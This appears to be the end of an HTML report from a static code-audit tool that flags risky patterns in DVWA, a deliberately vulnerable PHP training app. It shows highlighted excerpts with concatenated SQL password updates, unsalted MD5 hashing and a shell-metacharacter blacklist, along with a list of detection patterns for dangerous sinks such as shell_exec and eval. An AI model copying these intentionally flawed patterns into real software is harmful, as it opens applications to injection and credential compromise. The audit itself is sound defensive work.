class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t}",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 162,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">16:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t}",
"line": 15,
"start": 10,
"end": 21,
"severity": "unknown",
"note": ""
},
{
"id": 169,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">12:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"highlight\"><span class=\"line-number\">17:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">18:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">21:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\t}",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 174,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/high.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">11:</span> \t\t<span class=\"token string\">'| '</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">12:</span> \t\t<span class=\"token string\">'-'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token string\">'$'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token string\">'('</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token string\">')'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t\t<span class=\"token string\">'`'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">17:</span> \t\t<span class=\"token string\">'||'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Remove any of the charactars <span class=\"token keyword\">in</span> the array <span class=\"token punctuation\">(</span>blacklist<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_keys</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$substitutions</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$substitutions</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 16,
"start": 11,
"end": 22,
"severity": "unknown",
"note": ""
}
];
var searches = [
{
"filetype": "php",
"search": "\\s\\$_COOKIE",
"count": 15
},
{
"filetype": "php",
"search": "\\s\\$_FILES",
"count": 15
},
{
"filetype": "php",
"search": "\\s\\$_GET",
"count": 51
},
{
"filetype": "php",
"search": "\\s\\$_POST",
"count": 66
},
{
"filetype": "php",
"search": "\\s\\$_REQUEST",
"count": 20
},
{
"filetype": "php",
"search": "\\s\\$_SERVER",
"count": 15
},
{
"filetype": "php",
"search": "\\s\\$_SESSION",
"count": 23
},
{
"filetype": "php",
"search": "\\sbase64_decode\\s*\\(",
"count": 1
},
{
"filetype": "js",
"search": "\\seval\\s*\\(",
"count": 1
},
{
"filetype": "php",
"search": "\\sfile\\s*\\(",
"count": 1
},
{
"filetype": "php",
"search": "\\sfile_get_contents\\s*\\(",
"count": 2
},
{
"filetype": "php",
"search": "\\sfopen\\s*\\(",
"count": 1
},
{
"filetype": "php",
"search": "\\sinclude",
"count": 15
},
{
"filetype": "php",
"search": "\\sinsert",
"count": 12
},
{
"filetype": "php",
"search": "\\smd5\\s*\\(",
"count": 19
},
{
"filetype": "php",
"search": "\\sprepare",
"count": 1
},
{
"filetype": "php",
"search": "\\squery",
"count": 12
},
{
"filetype": "php",
"search": "\\srequire",
"count": 6
},
{
"filetype": "php",
"search": "\\sshell_exec\\s*\\(",
"count": 8
},
{
"filetype": "php",
"search": "\\ssystem\\s*\\(",
"count": 2
},
{
"filetype": "php",
"search": "\\supdate",
"count": 14
},
{
"filetype": "php",
"search": "`",
"count": 11
}
];
var storage = 'drek-f802fc2e-ece1-40cb-86aa-b7c93429fe8a';
var severities = ["ok","warn","critical","unknown"];
document.addEventListener('DOMContentLoaded', function(event) {
// KLUDGE: this is disgusting
var saved = localStorage.getItem(storage);
if (saved) {
matches = JSON.parse(saved);
}
// component for individual matches
Vue.component('matches', {
props : [ 'match' ],
template : '#match',
methods : {
// toggles match severity
severity: function (value) {
// clicking on a specific severity twice should set severity back to
// 'unknown'
this.match.severity = (this.match.severity === value)
? 'unknown'
: value ;
// emit a 'severity' event to trigger a save to localStorage
this.$emit('severity');
},
// is invoked when notes are added to a match
annotate: function () {
// emit an 'annotate' event to trigger a save to localStorage
this.$emit('annotate');
}
},
});
// entire Vue app
var app = new Vue({
el: '#app',
data: {
filetype : filetype,
filetypes : filetypes,
matches : matches,
searches : searches,
severities : severities,
show : {
ok : true,
warn : true,
critical : true,
unknown : true,
},
},
computed: {
// structure the matches into groups by filetype and search string
groups: function () {
// return matches for all filetypes
if (this.filetype === 'all') {
return _(matches)
.groupBy('search')
.toPairs()
.value();
}
// return matches for the specified filetype only
return _(matches)
.filter({ filetype: this.filetype })
.groupBy('search')
.toPairs()
.value();
},
// filter the "match" menu links by filetype
filteredSearches: function () {
return (this.filetype === 'all')
? this.searches
: _(this.searches)
.filter({ filetype: this.filetype })
.value();
},
},
methods: {
// filter matches by filetype
filterFiletype: function (e) {
this.filetype = e.target.getAttribute('data-filetype');
},
// filter matches by severity
filterSeverity: function (e) {
var severity = e.target.getAttribute('data-severity');
this.show[severity] = !this.show[severity];
},
// shows/hides sections
hideSection: function (e) {
var section = e.target.parentElement.parentElement;
var show = (section.getAttribute('data-show') === 'true')
? 'false'
: 'true';
var text = (e.target.text === 'Hide')
? 'Show'
: 'Hide';
e.target.text = text;
section.setAttribute('data-show', show);
},
// save match state to localStorage
save: function () {
localStorage.setItem(
storage,
JSON.stringify(this.matches)
);
}
},
});
});
</script>
</body>
</html>